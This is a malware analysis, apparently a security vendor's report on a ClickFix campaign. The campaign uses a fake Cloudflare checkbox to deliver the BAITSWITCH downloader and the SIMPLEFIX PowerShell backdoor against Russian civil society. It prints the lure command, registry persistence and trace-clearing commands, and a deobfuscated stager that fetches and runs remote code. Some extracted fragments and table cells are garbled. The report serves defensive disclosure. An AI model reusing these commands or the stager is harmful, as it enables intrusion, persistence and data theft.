
























In this section, a detailed analysis is provided for each component of the attack chain initiated when a victim visits a ClickFix webpage and performs the actions prompted by the site. The figure below provides an overview of the multi-stage attack chain.

Figure 1: Multi-stage end-to-end ClickFix campaign attack chain leveraging BAITSWITCH to deliver SIMPLEFIX.
The infection chain begins with a webpage masquerading as an information resource addressing challenges faced by members of civil society and think tanks in Russia. This webpage employs the ClickFix social-engineering attack method to trick users into executing a malicious command in the Windows Run dialog box by displaying a fake Cloudflare Turnstile checkbox, as shown in the figure below.

Figure 2: Fake Cloudflare Turnstile checkbox.
When the user clicks the checkbox, the embedded JavaScript code copies a malicious command (rundll32.exe \\captchanom.top\check\machinerie.dll,verifyme) to the user’s clipboard. Next, the page displays UI elements designed to prompt the user to paste and execute this command in the Windows Run dialog box. This action executes machinerie.dll (BAITSWITCH) via rundll32.exe, invoking its verifyme export function. While this UI is displayed, the JavaScript code waits for a set timeout before redirecting the victim to a decoy document hosted on Google Drive, created by the threat-actor controlled account narnobudaeva@gmail[.]com. The figure below shows the contents of this decoy document.

Figure 3: Example of a ClickFix social-engineering decoy document hosted on Google Drive.
This two-page decoy document describes efforts to build resilience for exiled members of Russian civil society, such as human rights defenders, journalists, educators, and civic activists, through mentorship and fellowship programs.
BAITSWITCH (Machinerie.dll) is a downloader that establishes persistence and retrieves stager payloads to execute the SIMPLEFIX backdoor. It connects to URLs using a hardcoded user-agent string (Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edge/133.0.0.0) to receive and execute commands. The command-and-control (C2) server responds with commands only when this specific user-agent string is used, returning a “404 Not Found” page otherwise.
BAITSWITCH makes five HTTP requests to the threat actor-controlled domain captchanom[.]top to receive various commands and download the PowerShell-based SIMPLEFIX backdoor. For each response from the C2 server, BAITSWITCH uses the lpCommandLine parameter of CreateProcessA to execute the command on the endpoint. Below is the sequence of requests made:
1. The first request to the URL hxxps://captchanom[.]top/coup/premier retrieves a command to establish persistence. This command executes the reg executable, configuring the UserInitMprLogonScript registry key to run a PowerShell script (downloaded later) with a specific argument at the next user logon. Below is the command received:
reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_SZ /d "powershell -WindowStyle Hidden -ep bypass \"%APPDATA%\Microsoft\Windows\FvFLcsr23.ps1\" \"7eHgxjgbBs3gHdkgx9AsRC\"" /f%2. The second request to the URL hxxps://captchanom[.]top/coup/deuxieme retrieves a command to store encrypted payloads in the Windows registry. The received command executes PowerShell to add a Base64-encoded, AES-encrypted PowerShell script (stored in $ii) and a Base64-encoded AES decryption key (stored in $iii) to the Windows registry keys EnthusiastMod and QatItems, respectively. This encrypted script will be decrypted and executed in subsequent stages. Below is the command received:
powershell -c "$ii = 'kXvyDMF+...iL54E0QbEXJyRA==';$iii = 'yuClT3Iwhv9SERwcmKipg=';$rrr = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon';if (-not (Test-Path $rrr)) {New-Item -Path $rrr -Force};try {$rrrr = [System.Text.Encoding]::UTF8.GetBytes($ii);Set-ItemProperty -Path $rrr -Name "EnthusiastMode" -Value $rrrr -Type Binary;$rrrrr = [System.Text.Encoding]::UTF8.GetBytes($iii);Set-ItemProperty -Path $rrr -Name "QatItems" -Value $rrrrr -Type Binary;}catch {}"3. In the third request to the URL hxxps://captchanom[.]top/coup/troisieme, BAITSWITCH downloads a PowerShell stager from a different server (southprovesolutions[.]com/FvFLcsr23) and saves it to the path %APPDATA%\Microsoft\Windows\FvFLcsr23.ps1, referenced earlier in the persistence setup. Below is the command received:
powershell -c "Invoke-WebRequest -Uri \"hxxps://southprovesolutions[.]com/FvFLcsr23\" -OutFile \"$Env:APPDATA\Microsoft\Windows\FvFLcsr23.ps1\""4. The fourth request to the URL hxxps://captchanom[.]top/coup/quatre retrieves a command to clear the RunMRU registry key. The RunMRU key stores the Most Recently Used (MRU) commands entered into the Run dialog (Win + R). Since the ClickFix attack begins with the user pasting the malicious command into "Win + R," this action effectively erases any trace of the attack. Below is the command received:
reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f5. In the fifth and final request to the URL hxxps://captchanom[.]top/, BAITSWITCH sends the victim’s hostname to the C2, possibly to register the victim with the C2 server. No response was observed from this URL.
On the next Windows logon, the PowerShell stager executes with the command-line parameter 7eHgxjgbBs3gHdkgx9AsRC, as specified in the logon script registry key.
This script uses basic string obfuscation techniques:
[^\x20-\x7E]).(?i)x[0-9A-Fa-f]{4}).Below is the deobfuscated PowerShell-based stager.
function WWW($value) {
$scriptBlock = [scriptblock]::Create($value); & $scriptBlock
};
function WWWWW {
param([string] $eeee, [string] $eeeee);
try {
$eee = [Convert]::FromBase64String($eeee);
$eeeeee = $eee[0. .15];
$eeeeeee = $eee[16..($eee.Length - 1)];
$e = [System.Security.Cryptography.Aes]::Create();
$e.Key = [Convert]::FromBase64String($eeeee);
$e.IV = $eeeeee;
$ee = $e.CreateDecryptor();
$eeeeeeee = $ee.TransformFinalBlock($eeeeeee, 0, $eeeeeee.Length);
return [Text.Encoding]::UTF8.GetString($eeeeeeee);
} finally {
if ($e) {
$e.Dispose()
}
}
};
$wwwwww = Get - ItemPropertyValue - Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon' - Name 'EnthusiastMode';
$wwwwwww = Get - ItemPropertyValue - Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon' - Name 'QatItems';
$key = $global: wwww + [System.Text.Encoding]::UTF8.GetString($wwwwwww);
$wwwwwwww = [System.Text.Encoding]::UTF8.GetString($wwwwww);
$w = WWWWW $wwwwwwww $key;
WWW - value $w;The stager has the following functionality:
HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon\\EnthusiastMode.HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\CLSID\53121F47-8C52-44A7-89A5-5595BB2B32BE}\DefaultIcon\\QatItems.7eHgxjgbBs3gHdkgx9AsRCyuClT3Iwhv9SERwcmKipg=.$ia = @("southprovesolutions.com");
$fff = $false;
while (-not $fff) {
foreach ($iii in $ia) {
if ((Invoke-WebRequest -Uri "https://$iii/" -UseBasicParsing -Method Head -TimeoutSec 5 -ErrorAction SilentlyContinue) -ne $null) {
$wc=New-Object System.Net.WebClient;
Invoke-Command -ScriptBlock ([scriptblock]::Create($wc.DownloadString("https://$iii/Zxdf")));
$fff = $true;
break;
}
else {}
};
if (-not $fff) {
Start-Sleep -Seconds 5;
}
};hxxps://southprovesolutions[.]com/Zxdf.SIMPLEFIX employs obfuscation techniques similar to those employed in the stager PowerShell script. The resulting deobfuscated script is available in the ThreatLabz GitHub repository.
The script enters a loop to execute the following steps every 3 minutes:
hxxps://southprovesolutions[.]com/KZouoRc and parse the response for commands to execute.hxxps://southprovesolutions[.]com/VUkXugsYgu, likely to notify the C2 server of the successful command execution.SIMPLEFIX supports the commands outlined in the table below:
Command | Description |
|---|---|
1 | Retrieves a URL hosting a binary and a command-line parameter used to launch this binary. If a filename is included in the URL, the binary is dropped with the same filename in the |
2 | Retrieves a set of commands to be executed on the user's machine. At the time of analysis, the commands received were used to collect information about the system, network, and user. The output of these commands is sent in an HTTP POST request to |
3 | Executes a PowerShell script and sends the command output via an HTTP POST request to |
Table 1: Commands supported by SIMPLEFIX.
At the time of analysis, the commands in the following table were received:
ID | Command | Description |
|---|---|---|
2 |
| Commands for reconnaissance, including gathering information about the user, network configuration, and system. |
| Collects information about the user. | |
3 |
| PowerShell script that exfiltrates information about a hardcoded list of file types found in a pre-configured list of directories. The file types correspond to documents and archives that may be of interest for strategic intelligence collection. The list of directories and file extensions scanned are very similar to the LOSTKEYS VBScript-based malware used by COLDRIVER in January 2025. |
| Terminates the SIMPLEFIX backdoor. |
Table 2: ThreatLabz observed these commands being sent to the SIMPLEFIX backdoor.
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。